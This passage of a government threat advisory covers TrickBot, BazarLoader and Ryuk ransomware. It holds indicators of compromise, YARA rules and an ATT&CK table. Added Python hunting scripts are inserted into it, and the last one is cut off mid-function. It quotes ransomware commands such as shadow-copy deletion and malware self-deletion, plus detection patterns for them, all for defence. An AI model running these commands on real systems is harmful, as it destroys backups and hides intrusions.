also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders\u2014like TrickBot and BazarLoader (or BazarBackdoor)\u2014as part of their malicious cyber campaigns. 
Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim\u2019s machine.\n\n#### TrickBot\n\nTrickBot began as a banking trojan descended from the Dyre malware; it now provides its operators a full suite of tools to conduct a wide range of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.\n\nIn early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims\u2014such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created `anchor_dns`, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.\n\n`anchor_dns` is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. `anchor_dns` uses a single-byte `XOR` cipher to encrypt its communications, which have been observed using key `0xB9`. Once decrypted, the string `anchor_dns` can be found in the DNS request traffic.\n\n#### TrickBot Indicators of Compromise\n\nAfter successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g. 
`mfjdieks.exe`) and places this file in one of the following directories.\n\n * C:\\Windows\\\n * C:\\Windows\\SysWOW64\\\n * C:\\Users\\\\[Username]\\AppData\\Roaming\\\n\nOnce the executable is running and successful in establishing communication with C2s, the executable places appropriate modules downloaded from C2s for the infected processor architecture type (32- or 64-bit instruction set), to the infected host\u2019s `%APPDATA%` or `%PROGRAMDATA%` directory, such as `%AppData\\Roaming\\winapp`. Some commonly named plugins that are created in a Modules subdirectory are (the detected architecture is appended to the module filename, e.g., `importDll32` or `importDll64`):\n\n * `Systeminfo`\n * `importDll`\n * `outlookDll`\n * `injectDll` with a directory (ex. `injectDLL64_configs`) containing configuration files: \n * `dinj`\n * `sinj`\n * `dpost`\n * `mailsearcher` with a directory (ex. `mailsearcher64_configs`) containing configuration file: \n * `mailconf`\n * `networkDll` with a directory (ex. `networkDll64_configs`) containing configuration file: \n * `dpost`\n * `wormDll`\n * `tabDll`\n * `shareDll`\n\nFilename `client_id` or `data` or `FAQ` with the assigned bot ID of the compromised system is created in the malware directory. Filename `group_tag` or `Readme.md` containing the TrickBot campaign IDs is created in the malware directory.\n\nThe malware may also drop a file named `anchorDiag.txt` in one of the directories listed above.\n\nPart of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded `GUID`. The `GUID` is composed of `/GroupID/ClientID/` with the following naming convention:\n\n`/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/`.\n\nThe malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. 
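The `anchor_dns` details above (single-byte `XOR` with key `0xB9`, the `anchor_dns` marker visible after decryption, the base64-encoded `/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/` GUID, and the four `anchor_dns` domains listed in this section) are enough to build the DNS-log check that the Recommended Mitigation Measures section later asks administrators to perform. The following Python script is an added example, not code from the advisory or from any of the agencies or vendors it cites. Two things the advisory does not state are assumed here and labelled as such: that the encrypted payload is carried hex-encoded in the leading DNS labels, and the whitespace-separated log layout of the constructed sample lines (the hostname `WS-HR-07`, build string `W10018363` and the `encode_beacon` helper exist only to build that sample).

```python
"""Triage DNS query logs for TrickBot anchor_dns beaconing.

Added example, not code from the advisory. Two things the advisory does not
specify are assumed here: the XOR-encrypted payload is carried hex-encoded
in the leading DNS label(s), and the log lines follow the constructed
"<timestamp> <client_ip> <qname> <qtype>" layout built in sample_log().
"""
import base64
import re
from typing import Iterable, List, Optional

XOR_KEY = 0xB9          # single-byte key observed in anchor_dns traffic
MARKER = b"anchor_dns"  # plaintext string visible after decryption
# anchor_dns domains listed in the advisory (defanged there with [.])
ANCHOR_DOMAINS = {"kostunivo.com", "chishir.com", "mangoclone.com", "onixcellent.com"}
# /anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/
GUID_RE = re.compile(rb"/anchor_dns/(?P<host>[^_/]+)_(?P<build>[^/]+?)\.(?P<client>[0-9A-Za-z]{32})/")
HEX_LABEL_RE = re.compile(r"[0-9a-fA-F]+")


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def hex_labels(qname: str) -> Optional[bytes]:
    """Concatenate the leading labels that are pure hex and return their bytes.

    A DNS label holds at most 63 octets, so a tunnelled payload is spread over
    several labels; stop at the first label that is not hex (the C2 domain).
    """
    payload = ""
    for label in qname.rstrip(".").split("."):
        if HEX_LABEL_RE.fullmatch(label) and len(label) % 2 == 0:
            payload += label
        else:
            break
    return bytes.fromhex(payload) if payload else None


def maybe_base64(data: bytes) -> Optional[bytes]:
    """The advisory says the GUID is sent base64-encoded, so peel that layer too."""
    try:
        return base64.b64decode(data, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def parse_guid(decoded: bytes) -> Optional[dict]:
    m = GUID_RE.search(decoded)
    return {k: v.decode() for k, v in m.groupdict().items()} if m else None


def analyze_query(qname: str) -> dict:
    """Check one query name for a known anchor_dns domain or a decryptable beacon."""
    qname = qname.rstrip(".").lower()
    result = {"qname": qname, "known_c2_domain": False, "anchor_marker": False, "guid": None}
    labels = qname.split(".")
    if len(labels) >= 2 and ".".join(labels[-2:]) in ANCHOR_DOMAINS:
        result["known_c2_domain"] = True
    raw = hex_labels(qname)
    if raw is not None:
        decoded = xor_decode(raw)
        for candidate in (decoded, maybe_base64(decoded)):
            if candidate and MARKER in candidate:
                result["anchor_marker"] = True
                result["guid"] = parse_guid(candidate)
                break
    return result


def hunt_dns(log_lines: Iterable[str]) -> List[dict]:
    """Return one finding per log line that matches either indicator."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        finding = analyze_query(fields[2])
        if finding["known_c2_domain"] or finding["anchor_marker"]:
            hits.append({"timestamp": fields[0], "client": fields[1], **finding})
    return hits


def encode_beacon(plaintext: bytes, domain: str, b64: bool = True) -> str:
    """Build a query name under the assumed encoding (base64 -> XOR -> hex labels).

    Test-data helper only: this is how the constructed sample below is made,
    not a documented description of the malware's own encoder.
    """
    payload = base64.b64encode(plaintext) if b64 else plaintext
    hexed = xor_decode(payload).hex()
    return ".".join([hexed[i:i + 60] for i in range(0, len(hexed), 60)] + [domain])


# Constructed GUID following the advisory's naming convention (hostname and
# build string are invented for the sample).
SAMPLE_GUID = b"/anchor_dns/WS-HR-07_W10018363.0123456789abcdef0123456789abcdef/"


def sample_log() -> List[str]:
    """Constructed DNS log lines, not real telemetry."""
    return [
        "2020-10-28T09:12:01Z 10.20.1.55 www.example.org A",
        "2020-10-28T09:12:03Z 10.20.1.55 checkip.amazonaws.com A",
        "2020-10-28T09:12:04Z 10.20.1.55 " + encode_beacon(SAMPLE_GUID, "kostunivo.com") + " TXT",
        "2020-10-28T09:15:04Z 10.20.1.55 " + encode_beacon(b"ping", "chishir.com", b64=False) + " A",
        "2020-10-28T09:16:00Z 10.20.1.77 a1b2c3d4.cdn.example.net A",  # hex-looking but benign
    ]


if __name__ == "__main__":
    for hit in hunt_dns(sample_log()):
        print(hit["timestamp"], hit["client"], hit["known_c2_domain"], hit["anchor_marker"], hit["guid"])
```

The domain match and the decrypt-and-search check are kept independent on purpose: a query to one of the listed domains is worth a ticket even when the label encoding differs from the assumption here, and a decrypted `anchor_dns` marker under a domain not yet on the list is exactly how new C2 infrastructure is found. The benign `a1b2c3d4` label shows why the marker, not merely "hex-looking labels", has to be the trigger.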
The scheduled task typically uses the following naming convention.\n\n`[random_folder_name_in_%APPDATA%_excluding_Microsoft]`\n\n`autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876)`.\n\nAfter successful execution, `anchor_dns` further deploys malicious batch scripts (`.bat`) using PowerShell commands.\n\nThe malware deploys self-deletion techniques by executing the following commands.\n\n * `cmd.exe /c timeout 3 && del C:\\Users\\[username]\\[malware_sample]`\n * `cmd.exe /C PowerShell \\\"Start-Sleep 3; Remove-Item C:\\Users\\[username]\\[malware_sample_location]\\\"`\n\nThe following domains found in outbound DNS records are associated with `anchor_dns`.\n\n * `kostunivo[.]com`\n * `chishir[.]com`\n * `mangoclone[.]com`\n * `onixcellent[.]com`\n\nThis malware used the following legitimate domains to test internet connectivity.\n\n * `ipecho[.]net`\n * `api[.]ipify[.]org`\n * `checkip[.]amazonaws[.]com`\n * `ip[.]anysrc[.]net`\n * `wtfismyip[.]com`\n * `ipinfo[.]io`\n * `icanhazip[.]com`\n * `myexternalip[.]com`\n * `ident[.]me`\n\nCurrently, there is an open-source tracker for TrickBot C2 servers located at <https://feodotracker.abuse.ch/browse/trickbot/>.\n\nThe `anchor_dns` malware historically used the following C2 servers.\n\n * `23[.]95[.]97[.]59`\n * `51[.]254[.]25[.]115`\n * `193[.]183[.]98[.]66`\n * `91[.]217[.]137[.]37`\n * `87[.]98[.]175[.]85`\n\n#### TrickBot YARA Rules\n\nrule anchor_dns_strings_filenames { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off strings or filenames used in malware\" \nauthor = \"NCSC\" \nhash1 = \"fc0efd612ad528795472e99cae5944b68b8e26dc\" \nhash2 = \"794eb3a9ce8b7e5092bb1b93341a54097f5b78a9\" \nhash3 = \"9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2\" \nhash4 = \"24d4bbc982a6a561f0426a683b9617de1a96a74a\" \nstrings: \n$ = \",Control_RunDLL \\x00\" \n$ = \":$GUID\" ascii wide \n$ = \":$DATA\" ascii wide \n$ = \"/1001/\" \n$ = /(\\x00|\\xCC)qwertyuiopasdfghjklzxcvbnm(\\x00|\\xCC)/ \n$ = 
/(\\x00|\\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\\x00|\\xCC)/ \n$ = \"start program with cmdline \\\"%s\\\"\" \n$ = \"Global\\\\\\fde345tyhoVGYHUJKIOuy\" \n$ = \"ChardWorker::thExecute: error registry me\" \n$ = \"get command: incode %s, cmdid \\\"%s\\\", cmd \\\"%s\\\"\" \n$ = \"anchorDNS\" \n$ = \"Anchor_x86\" \n$ = \"Anchor_x64\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_icmp_transport { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off ICMP transport strings\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$ = \"reset_connection <\\- %s\" \n$ = \"server_ok <\\- %s (packets on server %s)\" \n$ = \"erase successfully transmitted packet (count: %d)\" \n$ = \"Packet sended with crc %s -> %s\" \n$ = \"send data confimation to server(%s)\" \n$ = \"data recived from <\\- %s\" \n$ = \"Rearmost packed recived (id: %s)\" \n$ = \"send poll to server -> : %s\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them \n}\n\nrule anchor_dns_config_dexor { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)\" \nauthor = \"NCSC\" \nhash1 = \"d0278ec015e10ada000915a1943ddbb3a0b6b3db\" \nhash2 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nstrings: \n$x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? C3} \n$x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 
00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_installer { \nmeta: \ndescription = \"Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code\" \nauthor = \"NCSC\" \nhash1 = \"fa98074dc18ad7e2d357b5d168c00a91256d87d1\" \nhash2 = \"78f0737d2b1e605aad62af252b246ef390521f02\" \nstrings: \n$pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$ \n$pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll \n$deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08} \n$deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 
72 B8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand \n( uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\\2)) == 0x5A4D \nor \n$deob_x86 or $deob_x64 \n) \n}\n\nimport \"pe\" \nrule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains\" \nauthor = \"NCSC\" \nhash1 = \"ff8237252d53200c132dd742edc77a6c67565eee\" \nhash2 = \"c8299aadf886da55cb47e5cbafe8c5a482b47fc8\" \nstrings: \n$str1001 = {2F 31 30 30 31 2F 00} // /1001/ \n$strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL \n$ip1 = \"checkip.amazonaws.com\" ascii wide \n$ip2 = \"ipecho.net\" ascii wide \n$ip3 = \"ipinfo.io\" ascii wide \n$ip4 = \"api.ipify.org\" ascii wide \n$ip5 = \"icanhazip.com\" ascii wide \n$ip6 = \"myexternalip.com\" ascii wide \n$ip7 = \"wtfismyip.com\" ascii wide \n$ip8 = \"ip.anysrc.net\" ascii wide \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) \nand $str1001 \nand ( \nfor any i in (0..pe.number_of_sections): ( \npe.sections[i].name == \".addr\" \n) \nor \n$strCtrl \nor \n6 of ($ip*) \n) \n}\n\nrule anchor_dns_check_random_string_in_dns_response { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off checking random string in DNS response\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 
46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8} \n$x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_default_result_execute_command { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off default result value and executing command\" \nauthor = \"NCSC\" \nhash1 = \"056f326d9ab960ed02356b34a6dcd72d7180fc83\" \nhash2 = \"14e9d68bba7a184863667c680a8d5a757149aa36\" \nstrings: \n$x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00} \n$x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 
48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8} \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\nrule anchor_dns_pdbs { \nmeta: \ndescription = \"Rule to detect AnchorDNS samples based off partial PDB paths\" \nauthor = \"NCSC\" \nhash1 = \"f0e575475f33600aede6a1b9a5c14f671cb93b7b\" \nhash2 = \"1304372bd4cdd877778621aea715f45face93d68\" \nhash3 = \"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\" \nhash4 = \"f96613ac6687f5dbbed13c727fa5d427e94d6128\" \nhash5 = \"46750d34a3a11dd16727dc622d127717beda4fa2\" \nstrings: \n$ = \":\\\\\\MyProjects\\\\\\secondWork\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\simsim\\\\\\anchorDNS\" \n$ = \":\\\\\\\\[JOB]\\\\\\Anchor\\\\\\\" \n$ = \":\\\\\\Anchor\\\\\\Win32\\\\\\Release\\\\\\Anchor_\" \n$ = \":\\\\\\Users\\\\\\ProFi\\\\\\Desktop\\\\\\data\\\\\\Win32\\\\\\anchor\" \ncondition: \n(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them \n}\n\n#### BazarLoader/BazarBackdoor\n\nBeginning in approximately early 2020, actors believed to be associated with TrickBot began using BazarLoader and BazarBackdoor to infect victim networks. The loader and backdoor work closely together to achieve infection and communicate with the same C2 infrastructure. Campaigns using Bazar represent a new technique for cybercriminals to infect and monetize networks and have increasingly led to the deployment of ransomware, including Ryuk. BazarLoader has become one of the most commonly used vectors for ransomware deployment.\n\nDeployment of the BazarLoader malware typically comes from phishing email and contains the following:\n\n * Phishing emails are typically delivered by commercial mass email delivery services. 
Email received by a victim will contain a link to an actor-controlled Google Drive document or other free online file-hosting solutions, typically purporting to be a PDF file.\n * This document usually references a failure to create a preview of the document and contains a link to a URL hosting a malware payload in the form of a misnamed or multiple extension file.\n * Emails can appear as routine, legitimate business correspondence about customer complaints, hiring decisions, or other important tasks that require the attention of the recipient. \n * Some email communications have included the recipient\u2019s name or employer name in the subject line and/or email body.\n\nThrough phishing emails linking users to Google Documents, actors used the below identified file names to install BazarLoader:\n\n * `Report-Review26-10.exe`\n * `Review_Report15-10.exe`\n * `Document_Print.exe`\n * `Report10-13.exe`\n * `Text_Report.exe`\n\nBazar activity can be identified by searching the system startup folders and Userinit values under the `HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon` registry key:\n\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk`\n\nFor a comprehensive list of indicators of compromise regarding BazarLoader and other malware, see <https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html>.\n\n#### Indicators\n\nIn addition to TrickBot and BazarLoader, threat actors are using malware, such as KEGTAP, BEERBOT, SINGLEMALT, and others as they continue to change tactics, techniques, and procedures in their highly dynamic campaign. 
The following C2 servers are known to be associated with this malicious activity.\n\n * `45[.]148[.]10[.]92`\n * `170[.]238[.]117[.]187`\n * `177[.]74[.]232[.]124`\n * `185[.]68[.]93[.]17`\n * `203[.]176[.]135[.]102`\n * `96[.]9[.]73[.]73`\n * `96[.]9[.]77[.]142`\n * `37[.]187[.]3[.]176`\n * `45[.]89[.]127[.]92`\n * `62[.]108[.]35[.]103`\n * `91[.]200[.]103[.]242`\n * `103[.]84[.]238[.]3`\n * `36[.]89[.]106[.]69`\n * `103[.]76[.]169[.]213`\n * `36[.]91[.]87[.]227`\n * `105[.]163[.]17[.]83`\n * `185[.]117[.]73[.]163`\n * `5[.]2[.]78[.]118`\n * `185[.]90[.]61[.]69`\n * `185[.]90[.]61[.]62`\n * `86[.]104[.]194[.]30`\n * `31[.]131[.]21[.]184`\n * `46[.]28[.]64[.]8`\n * `104[.]161[.]32[.]111`\n * `107[.]172[.]140[.]171`\n * `131[.]153[.]22[.]148`\n * `195[.]123[.]240[.]219`\n * `195[.]123[.]242[.]119`\n * `195[.]123[.]242[.]120`\n * `51[.]81[.]113[.]25`\n * `74[.]222[.]14[.]27`\n\n#### Ryuk Ransomware\n\nTypically, Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the [United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>), on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the `HERMES` tag but, in some infections, the files have `.ryk` added to the filename, while others do not. 
In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.\n\nWhile navigating the victim network, Ryuk actors will commonly use commercial off-the-shelf products\u2014such as Cobalt Strike and PowerShell Empire\u2014in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump cleartext passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject a malicious dynamic-link library (DLL) into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.\n\nRyuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools\u2014such as net view, net computers, and ping\u2014to locate mapped network shares, domain controllers, and Active Directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management (WinRM), and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as BloodHound.\n\nOnce dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a `.bat` file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.\n\nIn addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. 
Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The `RyukReadMe` file placed on the system after encryption provides either one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk actors are now designating a ransom amount only after the victim makes contact.\n\nThe victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.\n\nInitial testing indicates that the `RyukReadMe` file does not need to be present for the decryption script to run successfully, but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the `RyukReadMe` file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.\n\nAccording to MITRE, [Ryuk](<https://attack.mitre.org/versions/v7/software/S0446/>) uses the ATT&CK techniques listed in Table 1.\n\n_Table 1: Ryuk ATT&CK techniques_\n\n**Technique** | **Use** \n---|--- \nSystem Network Configuration Discovery [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016/>)] | Ryuk has called `GetIpNetTable` in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries. \nMasquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005/>)] | Ryuk has constructed legitimate-appearing installation folder paths by calling `GetWindowsDirectoryW` and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as `C:\\Users\\Public`. 
\nProcess Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)] | Ryuk has injected itself into remote processes to encrypt files using a combination of `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread`. \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)] | Ryuk has called `CreateToolhelp32Snapshot` to enumerate all running processes. \nCommand and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)] | Ryuk has used `cmd.exe` to create a Registry entry to establish persistence. \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)] | Ryuk has called `GetLogicalDrives` to enumerate all mounted drives, and `GetDriveTypeW` to determine the drive type. \nNative API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106/>)] | Ryuk has used multiple native APIs including `ShellExecuteW` to run executables; `GetWindowsDirectoryW` to create folders; and `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread` for process injection. \nAccess Token Manipulation [[T1134](<https://attack.mitre.org/versions/v7/techniques/T1134/>)] | Ryuk has attempted to adjust its token privileges to have the `SeDebugPrivilege`. \nData Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486/>)] | Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of `.RYK`. Encrypted directories have had a ransom note of `RyukReadMe.txt` written to the directory. \nService Stop [[T1489](<https://attack.mitre.org/versions/v7/techniques/T1489/>)] | Ryuk has called `kill.bat` for stopping services, disabling services and killing processes. 
\nInhibit System Recovery [[T1490](<https://attack.mitre.org/versions/v7/techniques/T1490/>)] | Ryuk has used `vssadmin Delete Shadows /all /quiet` to delete volume shadow copies and `vssadmin resize shadowstorage` to force deletion of shadow copies created by third-party applications. \nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)] | Ryuk has used the Windows command line to create a Registry entry under `HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run` to establish persistence. \nImpair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001/>)] | Ryuk has stopped services related to anti-virus. \n \n### Mitigations\n\nFor a downloadable copy of IOCs, see AA20-302A.stix. For additional IOCs detailing this activity, see <https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>.\n\n#### Plans and Policies\n\nCISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans\u2014the practice of executing essential functions through emergencies (e.g., cyberattacks)\u2014to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. 
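Several rows of Table 1 (the `vssadmin Delete Shadows /all /quiet` and `vssadmin resize shadowstorage` commands, the `HKEY_CURRENT_USER\...\CurrentVersion\Run` entry created from the command line, `kill.bat`) and the TrickBot IOC section above (the `autoupdate#[5_random_numbers]` scheduled task, the `timeout 3 && del` and `Start-Sleep 3; Remove-Item` self-deletion commands) are all visible in process-creation telemetry. The following Python script is an added example of hunting for them in such telemetry; it is not code from the advisory or from any vendor it cites. The pipe-separated event layout, the host and user names, the `/TR` and `/d` paths and the `vssadmin resize shadowstorage` arguments in the sample are all constructed for the example; map your own source (Sysmon Event ID 1, or Windows 4688 with command-line auditing enabled) onto the same five fields.

```python
"""Hunt process-creation events for the Ryuk and TrickBot command lines the
advisory describes (Table 1, and the TrickBot IOC section).

Added example, not code from the advisory. It reads a constructed
"<timestamp>|<host>|<user>|<image>|<command line>" layout; map Sysmon
Event ID 1 or Windows 4688 (with command-line auditing on) onto it.
"""
import re
from typing import Dict, Iterable, List, Set, Tuple

# (rule name, where the advisory describes the behaviour, pattern)
RULES = [
    ("vssadmin shadow copy deletion", "Table 1: Inhibit System Recovery T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("vssadmin shadow storage resize", "Table 1: Inhibit System Recovery T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b", re.I)),
    ("Run key written from the command line", "Table 1: Registry Run Keys T1547.001",
     re.compile(r"\breg(?:\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("kill.bat service and process termination", "Table 1: Service Stop T1489",
     re.compile(r"\bkill\.bat\b", re.I)),
    ("TrickBot autoupdate#NNNNN scheduled task", "TrickBot IOC section",
     re.compile(r"\bschtasks(?:\.exe)?\b.*\bautoupdate#\d{5}\b", re.I)),
    ("TrickBot delayed self-deletion", "TrickBot IOC section",
     re.compile(r"timeout\s+\d+\s*&&\s*del\b|Start-Sleep\s+\d+\s*;\s*Remove-Item\b", re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed event; the command line may itself contain '|'."""
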